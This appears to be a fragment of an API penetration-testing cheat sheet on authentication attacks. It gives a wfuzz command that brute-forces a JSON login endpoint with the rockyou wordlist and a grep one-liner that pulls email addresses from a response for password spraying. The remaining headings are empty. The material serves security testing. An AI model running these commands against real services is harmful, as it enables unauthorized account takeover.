Classic Authentication Attacks
1. Password Brute-Force Attacks
wfuzz -d '{"email":"a@email.com","password":"FUZZ"}' -H 'Content-Type: application/json' -z file,/path/to/rockyou.txt -u http://target/api/auth/login --hc 405
2. Password Spraying
grep -oe "[a-zA-Z0-9._]\+@[a-zA-Z]\+.[a-zA-Z]\+" response.json
3. Analyzing Your Results
4. Base64 Encoding
tools and wordlist :
Last updated